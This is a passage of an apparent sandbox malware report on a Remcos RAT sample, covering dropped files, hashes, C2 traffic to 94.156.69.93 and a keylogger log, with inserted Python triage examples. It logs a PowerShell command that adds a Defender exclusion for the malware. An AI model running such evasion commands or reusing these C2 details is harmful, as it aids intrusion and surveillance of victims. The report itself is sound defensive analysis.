                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/6xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTjOv
                      MD5:0454D4DBB6AA05FB8AA823FCDC9A6CC4
                      SHA1:34BE814378D1B6517891265C19EABEA09F9C65E4
                      SHA-256:130E0A8D3B3614B64F798CA2A91EE19C43B559820E145769E4F1E5E8BC8C2C0A
                      SHA-512:1EC2C48011DCAFC916594ECD992704D17C14BE51BFA9043B53BFAF8FA29160EBAF1F5A775163BE9DC06AA2304AC24A21C9D6304BD0FF09254C5B47111F92FE96
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                      Process:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1595
                      Entropy (8bit):5.09524540039865
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtL/6xvn:cge7QYrFdOFzOzN33ODOiDdKrsuTjOv
                      MD5:0454D4DBB6AA05FB8AA823FCDC9A6CC4
                      SHA1:34BE814378D1B6517891265C19EABEA09F9C65E4
                      SHA-256:130E0A8D3B3614B64F798CA2A91EE19C43B559820E145769E4F1E5E8BC8C2C0A
                      SHA-512:1EC2C48011DCAFC916594ECD992704D17C14BE51BFA9043B53BFAF8FA29160EBAF1F5A775163BE9DC06AA2304AC24A21C9D6304BD0FF09254C5B47111F92FE96
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
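The task definition above is cut off before its Actions element, but the "Run new task" event earlier in this report names the executable the task launches: C:\Users\user\AppData\Roaming\jdSldfVS.exe. The following is an added example, not part of the Joe Sandbox report, showing how a responder would triage such a task XML offline: it checks for an enabled logon trigger, an action running from a user-writable directory (the pattern behind the report's "Scheduled temp file as task from temp location" Sigma hit), a registration date far older than the file, and an elevated run level. The XML is constructed here from the visible elements plus an assumed <Actions> block pointing at that path; the function and constant names are the example's own.

```python
"""Triage of a Task Scheduler XML definition like the one dropped above.

Added example, not part of the Joe Sandbox report. CONSTRUCTED_TASK repeats the
elements visible in the dropped task (registration date, logon trigger, LeastPrivilege
principal, settings) and adds an assumed <Actions> element pointing at the path named
in the report's 'Run new task' entry.
"""
import re
import xml.etree.ElementTree as ET
from datetime import date

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)

CONSTRUCTED_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\jdSldfVS.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def load_task(data):
    """Parse task XML given as str or bytes.

    Files under C:\\Windows\\System32\\Tasks are UTF-16 with a BOM; the sandbox dump is
    ASCII with a declaration that still says UTF-16. The declaration is stripped so the
    parser never has to reconcile the declared encoding with the real one.
    """
    if isinstance(data, bytes):
        utf16 = data.startswith((b"\xff\xfe", b"\xfe\xff"))
        data = data.decode("utf-16" if utf16 else "utf-8")
    data = re.sub(r"^\s*<\?xml[^>]*\?>", "", data).lstrip()
    return ET.fromstring(data)


def triage_task(root, reference: date) -> list:
    """Return human-readable findings for one task; an empty list means nothing notable."""
    findings = []
    for trig in root.findall("t:Triggers/t:LogonTrigger", TASK_NS):
        if trig.findtext("t:Enabled", "true", TASK_NS).strip().lower() == "true":
            user = trig.findtext("t:UserId", "<any user>", TASK_NS).strip()
            findings.append(f"runs at logon of {user}")
    for cmd in root.findall("t:Actions/t:Exec/t:Command", TASK_NS):
        path = (cmd.text or "").strip()
        if USER_WRITABLE.search(path):
            findings.append(f"executes from user-writable path: {path}")
    registered = root.findtext("t:RegistrationInfo/t:Date", "", TASK_NS).strip()
    if registered:
        # Only the calendar date matters here, so the time portion is not parsed.
        # A registration date far older than the file is a copied-template artefact.
        age = (reference - date.fromisoformat(registered[:10])).days
        if age > 365:
            findings.append(f"registration date {registered[:10]} is {age} days before the reference date")
    if root.findtext("t:Principals/t:Principal/t:RunLevel", "", TASK_NS).strip() == "HighestAvailable":
        findings.append("requests HighestAvailable run level")
    return findings


def triage_xml(data, reference_iso: str = "2024-07-01") -> list:
    """Convenience wrapper: data as str or bytes, reference date as an ISO string."""
    return triage_task(load_task(data), date.fromisoformat(reference_iso))


if __name__ == "__main__":
    for finding in triage_xml(CONSTRUCTED_TASK):
        print("-", finding)
```

Against the constructed task this reports the logon trigger, the %APPDATA% launch path and the 2014 registration date (3537 days before the analysis date), and stays silent on the run level, which is LeastPrivilege as in the dropped file. The same function accepts the UTF-16 files collected from C:\Windows\System32\Tasks on a live host.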
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1011712
                      Entropy (8bit):7.795064861179612
                      Encrypted:false
                      SSDEEP:24576:OGIRtbsb56UfvzYc0UuGwsZIazwvZgiLF7i8eTqCs:mtgzZgscZfLFPr
                      MD5:EA0D00B95A91C801893B5526347170BB
                      SHA1:26D81494EB3C0FD67A6037DBD68E3BF8C7677D0D
                      SHA-256:6B585CAAF4299C406C45A3BEB76A8624D159404E1AAC48A292976119C6D9B72C
                      SHA-512:3B06324A0CB87E821DDC9980A23C68FD886F0A6EE639CE6E349ADF3CD9C17E07AA129218C237338317907EF291FF45485E7FA7EFADBC1C019B342D1B6D8731BB
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 32%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0.................. ........@.. ....................................@.................................d...O.......T............................................................................ ............... ..H............text........ ...................... ..`.rsrc...T...........................@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
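The dropped-file records above are the raw material for an IOC list, but they mix sample artefacts with platform noise: the seven 60-byte files written by powershell.exe are PowerShell's own AppLocker probe (the __PSScriptPolicyTest file every PowerShell start writes) and have nothing to do with the sample, while the Remcos keylogger log is shown only as a dot-interleaved UTF-16 preview. The following added example, not part of the Joe Sandbox report or its tooling, parses records in this "Key:Value" layout, drops the noise by hash, keeps everything flagged malicious or matched by Yara or antivirus, and decodes the logs.dat preview. The SAMPLE records are constructed from values printed in this report; the noise hash set and all function names are the example's own.

```python
"""Triage of the flattened 'Dropped Files' records above.

Added example, not part of the Joe Sandbox report or its tooling. A record starts at
each 'Process:' line, holds 'Key:Value' lines, and a line beginning with '•' belongs
to the key before it. SAMPLE is constructed from values shown in the report.
"""
import re
from dataclasses import dataclass, field

SAMPLE = r"""
Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
File Type:data
Size (bytes):224
SHA-256:C4D52FDB08880FDA02E3A4F182935D08F3AE7A129CAED0D826C5CA8FDFAA4B79
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):1011712
SHA-256:6B585CAAF4299C406C45A3BEB76A8624D159404E1AAC48A292976119C6D9B72C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 32%
"""

# Preview of C:\ProgramData\remcos\logs.dat exactly as the report renders it.
LOGS_DAT_PREVIEW = (
    "....[.2.0.2.4./.0.7./.0.1. .1.3.:.4.1.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r."
    " .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.]........."
    "{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}....."
)

# SHA-256 of files the platform writes regardless of the sample: PowerShell's AppLocker
# probe. Extend this set with other known-benign artefacts as they are identified.
SANDBOX_NOISE = {"96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7"}


@dataclass
class Record:
    fields: dict = field(default_factory=dict)   # "Key" -> "Value"
    bullets: dict = field(default_factory=dict)  # "Key" -> ["bullet text", ...]


def parse_records(text: str) -> list:
    """Split the flat Key:Value dump into one Record per 'Process:' line."""
    records, current, last_key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            if current is not None and last_key is not None:
                current.bullets.setdefault(last_key, []).append(line.lstrip("• ").strip())
            continue
        key, sep, value = line.partition(":")  # split at the first colon only
        if not sep:
            continue
        if key == "Process":
            current = Record()
            records.append(current)
        if current is None:
            continue
        current.fields[key] = value.strip()
        last_key = key
    return records


def triage(records: list) -> list:
    """Return the records worth keeping as IOCs, each with its reasons; noise removed."""
    iocs = []
    for rec in records:
        sha = rec.fields.get("SHA-256", "").upper()
        if sha in SANDBOX_NOISE:
            continue
        reasons = []
        if rec.fields.get("Malicious") == "true":
            reasons.append("flagged malicious by the sandbox")
        for hit in rec.bullets.get("Yara Hits", []):
            m = re.search(r"Rule: (\S+),.*Source: (.*?), Author:", hit)
            if m:
                reasons.append(f"yara {m.group(1)} matched {m.group(2)}")
        for av in rec.bullets.get("Antivirus", []):
            reasons.append(av.lower())
        if reasons:
            iocs.append({"sha256": sha, "written_by": rec.fields.get("Process", ""),
                         "size": int(rec.fields.get("Size (bytes)", "0")), "reasons": reasons})
    return iocs


def decode_utf16_preview(preview: str) -> list:
    """Recover text lines from a preview of a UTF-16LE file.

    The report prints every non-printable byte as '.', so each ASCII character is
    followed by the '.' of its zero high byte. Dropping that byte and splitting on the
    remaining runs of '.' (NUL, CR, LF) gives the lines. A literal '.' in the text is
    indistinguishable from a NUL in this rendering; that limitation is accepted here.
    """
    collapsed = re.sub(r"([^.])\.", r"\1", preview)
    return [part for part in re.split(r"\.{2,}", collapsed) if part.strip()]


if __name__ == "__main__":
    for ioc in triage(parse_records(SAMPLE)):
        print(ioc["sha256"], ioc["size"], "; ".join(ioc["reasons"]))
    for line in decode_utf16_preview(LOGS_DAT_PREVIEW):
        print("logs.dat:", line)
```

Run on the three constructed records this keeps the keylogger log (Yara hit on C:\ProgramData\remcos\logs.dat) and the persistence copy of the sample (two AV hits), drops the PowerShell probe, and recovers the three lines of the keylogger log shown decoded above. Filtering by hash rather than by file size or writer process keeps the rule precise: a 60-byte file written by powershell.exe is not benign per se, only that exact content is.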
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.795064861179612
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      • Win32 Executable (generic) a (10002005/4) 49.78%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:HUED23EDE5UGRFQ.exe
                      File size:1'011'712 bytes
                      MD5:ea0d00b95a91c801893b5526347170bb
                      SHA1:26d81494eb3c0fd67a6037dbd68e3bf8c7677d0d
                      SHA256:6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c
                      SHA512:3b06324a0cb87e821ddc9980a23c68fd886f0a6ee639ce6e349adf3cd9c17e07aa129218c237338317907ef291ff45485e7fa7efadbc1c019b342d1b6d8731bb
                      SSDEEP:24576:OGIRtbsb56UfvzYc0UuGwsZIazwvZgiLF7i8eTqCs:mtgzZgscZfLFPr
                      TLSH:2F2501C2E5908682ED295F7810366C640377BE767CB5E28D9D4DB0B16BF37A70422D8B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.................. ........@.. ....................................@................................
                      Icon Hash:1103212484000000
                      Entrypoint:0x4deeb6
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6682DD86 [Mon Jul 1 16:47:02 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdee64 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x18a54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xdcebc | 0xdd000 | eeb374652e0640e661390343b550f12f | False | 0.9691896740667421 | OpenPGP Public Key | 7.9794014993218445 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe0000 | 0x18a54 | 0x19000 | 2a958b86e9eac7dc11d5316f6c4eb566 | False | 0.18439453125 | data | 3.238054128897843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfa000 | 0xc | 0x800 | f353ee3eb698afe9dd364954c62fb864 | False | 0.01611328125 | data | 0.03037337037012526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xe01d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 23622 x 23622 px/m | | | 0.3324468085106383
RT_ICON | 0xe0640 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 23622 x 23622 px/m | | | 0.25117260787992496
RT_ICON | 0xe16e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 23622 x 23622 px/m | | | 0.2183609958506224
RT_ICON | 0xe3c90 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 23622 x 23622 px/m | | | 0.19550070854983467
RT_ICON | 0xe7eb8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 23622 x 23622 px/m | | | 0.1723796285342482
RT_GROUP_ICON | 0xf86e0 | 0x4c | data | | | 0.75
RT_GROUP_ICON | 0xf872c | 0x14 | data | | | 1.05
RT_VERSION | 0xf8740 | 0x312 | data | | | 0.43638676844783714
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/01/24-19:44:18.352759 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
07/01/24-19:41:59.286996 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 19:41:59.280551910 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:41:59.285382986 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:41:59.285702944 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:41:59.286995888 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:41:59.291820049 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:00.880173922 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:00.904875040 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:42:00.909691095 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:01.010234118 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:01.128710985 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:42:02.228837967 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:42:02.233824968 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.6
Jul 1, 2024 19:42:02.233891010 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:42:02.235013008 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:42:02.240540028 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.6
Jul 1, 2024 19:42:02.858299971 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.6
Jul 1, 2024 19:42:02.858437061 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:42:02.871731043 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:42:02.876640081 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:03.858366013 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.6
Jul 1, 2024 19:42:03.858416080 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:42:17.700526953 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:17.702244997 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:42:17.707052946 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:47.754066944 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:42:47.755279064 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:42:47.760703087 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:43:17.767117023 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:43:17.769068003 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:43:17.775547028 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:43:48.222774029 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:43:48.225577116 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:43:48.232368946 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:43:52.176400900 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:43:52.503951073 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:43:53.206918955 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:43:54.503787041 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:43:57.003794909 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:44:01.910087109 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:44:11.707464933 CEST | 49715 | 80 | 192.168.2.6 | 178.237.33.50
Jul 1, 2024 19:44:18.352758884 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:44:18.355592012 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:44:18.360419989 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:44:49.272547960 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:44:49.277657032 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:44:49.282766104 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:45:20.157531023 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:45:20.160970926 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:45:20.166017056 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:45:50.248716116 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Jul 1, 2024 19:45:50.252813101 CEST | 49712 | 2973 | 192.168.2.6 | 94.156.69.93
Jul 1, 2024 19:45:50.257771969 CEST | 2973 | 49712 | 94.156.69.93 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 19:42:02.210078955 CEST | 54801 | 53 | 192.168.2.6 | 1.1.1.1
Jul 1, 2024 19:42:02.219374895 CEST | 53 | 54801 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 1, 2024 19:42:02.210078955 CEST | 192.168.2.6 | 1.1.1.1 | 0x772d | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 1, 2024 19:42:02.219374895 CEST | 1.1.1.1 | 192.168.2.6 | 0x772d | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49715 | 178.237.33.50 | 80 | 4896 | C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
Timestamp | Bytes transferred | Direction | Data
Jul 1, 2024 19:42:02.235013008 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                      Host: geoplugin.net
                      Cache-Control: no-cache
Jul 1, 2024 19:42:02.858299971 CEST | 1170 | IN | HTTP/1.1 200 OK
                      date: Mon, 01 Jul 2024 17:42:02 GMT
                      server: Apache
                      content-length: 962
                      content-type: application/json; charset=utf-8
                      cache-control: public, max-age=300
                      access-control-allow-origin: *
                      Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                      Target ID:0
                      Start time:13:41:56
                      Start date:01/07/2024
                      Path:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0x50000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0xf30000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
